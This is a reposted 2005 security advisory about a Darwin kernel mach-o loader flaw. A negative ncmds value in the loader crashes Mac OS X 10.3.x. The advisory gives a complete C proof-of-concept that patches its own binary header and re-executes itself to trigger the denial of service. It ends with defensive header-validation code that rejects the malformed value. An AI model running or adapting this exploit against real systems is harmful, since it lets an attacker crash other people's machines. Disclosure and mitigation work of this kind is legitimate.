Re: Darwin Kernel Vulnerability
On Wed, Jan 19, 2005 at 11:53:15AM -0800, nemo@xxxxxxxxxxxxxxxx wrote:
> moderator: resending this mail since it appears to have got dropped, if not,
> please ignore this message.
>
> _,'| _.-''``-...___..--';)
> /_ \'. __..-' , ,--...--'''
> <\ .`--''' ` /'
> `-';' ; ; ;
> __...--'' ___...--_..' .;.'
> fL (,__....----''' (,..--'' felinemenace.org
>
> Program: Darwin Kernel 7.1
Affects <= Darwin Kernel 7.7.0
Sorry about the rushed advisory.
- nemo
> Impact: DoS, Possible local privilege escalation.
> Discovered: 8th January 2005 by nemo -( nemo @ felinemenace.org )-
> Writeup and exploits:
>
> 1) Background
>
> Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3. Some of the bugs
> we investigated exist due to lack of input validation in the mach-o loader.
>
> 2) Description
>
> In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the
> most part each field is trusted to be acceptable.
>
> In the mach-o loader code (parse_machfile()) ncmds and offset are both
> declared as signed integers, however the appropriate structs used to read
> from the file are unsigned.
> After a little investigation a DoS was quickly written to set ncmds to -1.
>
> ncmds = header->ncmds;
> while (ncmds--) {
>
> The attached code will cause a denial of service on MacOSX <= 10.3.7.
>
> 3) Notes
> During our audit of the Darwin Kernel many bugs stood out, however we have
> not had time to follow through on most of them. Something that caught our
> attention was the misuse of the copyinstr() command. This function will not
> force a NULL character to be appended to the string copied in, however it
> seems in many cases the size passed to the function doesn't take this into
> account.
> Unfortunately, as security goes, it's all about who posts first.
> http://www.immunitysec.com/downloads/nukido.pdf
>
> 4) Vendor status/notes/fixes/statements
> Apple have been notified about this bug.
>
> 5) Exploit
>
> //---------------------( fm-nacho.c )--------------------------
> /*
>  * DoS for Darwin Kernel Version < 7.5.0
>  * -(nemo@xxxxxxxxxxxxxxx)-
>  * 2005
>  *
>  * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
>  * irc.pulltheplug.org (#social)
>  */
>
> #include <stdio.h>
> #include <stdlib.h>   /* exit() */
> #include <unistd.h>   /* sleep(), execv() */
>
> int main(int ac, char **av)
> {
>     FILE *me;
>     int rpl = 0xffffffff;   /* ncmds value that reads as -1 once the loader treats it as signed */
>     fpos_t pos = 0x10;      /* file offset of the ncmds field in the mach_header */
>
>     printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
>     printf("-( nemo@xxxxxxxxxxxxxxx )-\n\n");
>     printf("[+] Opening file for writing.\n");
>     /* The program patches its own executable (argv[0]) in place. */
>     if(!(me = fopen(*av,"r+"))) {
>         printf("[-] Error opening exe.\n");
>         exit(1);
>     }
>     printf("[+] Seeking to ncmds.\n");
>     if((fsetpos(me,&pos)) == -1) {
>         printf("[-] Error seeking to ncmds.\n");
>         exit(1);
>     }
>     printf("[+] Changing ncmds to 0x%x.\n",rpl);
>     if(fwrite(&rpl,4,1,me) < 1) {
>         printf("[-] Error writing to file.\n");
>         exit(1);
>     }
>     fclose(me);
>     printf("[+] Re-executing with modified mach-o header.\n");
>     sleep(5);
>     /* Re-exec the patched binary so the kernel loader parses the bad header. */
>     if(execv(*av,av) == -1 ) {
>         printf("[-] Error executing %s, please run manually.\n",*av);
>         exit(1);
>     }
>     exit(0); // hrm
> }
>
>
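As an added illustration (not nemo's code, and not Apple's fix) of the bounds check the advisory says parse_machfile() lacks: ncmds and sizeofcmds are handled as unsigned and bounded by the bytes actually present, so the 0xffffffff value the PoC writes at offset 0x10 is rejected up front instead of driving the `while (ncmds--)` loop past the load-command table. The struct layouts follow the 32-bit mach-o header format; validate_mach32() and check_with_ncmds() are hypothetical names, and the sample buffer is constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* 32-bit mach_header and load_command layout from <mach-o/loader.h>,
 * redeclared here so the example builds on any platform. */
#define MH_MAGIC 0xfeedfaceU
struct mh32 {
    uint32_t magic, cputype, cpusubtype, filetype;
    uint32_t ncmds, sizeofcmds, flags;   /* ncmds sits at offset 0x10 */
};
struct lc { uint32_t cmd, cmdsize; };

/* Hypothetical hardened check: every count and size is treated as unsigned
 * and bounded by what is really in the buffer. Returns 1 if the header and
 * its load-command table are consistent, 0 otherwise. */
int validate_mach32(const uint8_t *buf, size_t len)
{
    struct mh32 mh;
    size_t off, end;
    uint32_t i;

    if (len < sizeof mh) return 0;
    memcpy(&mh, buf, sizeof mh);                          /* alignment-safe */
    if (mh.magic != MH_MAGIC) return 0;
    if (mh.sizeofcmds > len - sizeof mh) return 0;        /* table in file  */
    if (mh.ncmds > mh.sizeofcmds / sizeof(struct lc)) return 0; /* kills -1 */
    off = sizeof mh;
    end = off + mh.sizeofcmds;
    for (i = 0; i < mh.ncmds; i++) {
        struct lc c;
        if (end - off < sizeof c) return 0;               /* table too short */
        memcpy(&c, buf + off, sizeof c);
        if (c.cmdsize < sizeof c || c.cmdsize > end - off) return 0;
        off += c.cmdsize;
    }
    return 1;
}

/* Constructed sample: a header followed by one 16-byte load command, with
 * ncmds set to the value under test (the PoC writes 0xffffffff). */
int check_with_ncmds(uint32_t ncmds)
{
    uint8_t buf[sizeof(struct mh32) + 16];
    struct mh32 mh = { MH_MAGIC, 0, 0, 0, ncmds, 16, 0 };
    struct lc c = { 1, 16 };

    memset(buf, 0, sizeof buf);
    memcpy(buf, &mh, sizeof mh);
    memcpy(buf + sizeof mh, &c, sizeof c);
    return validate_mach32(buf, sizeof buf);
}
```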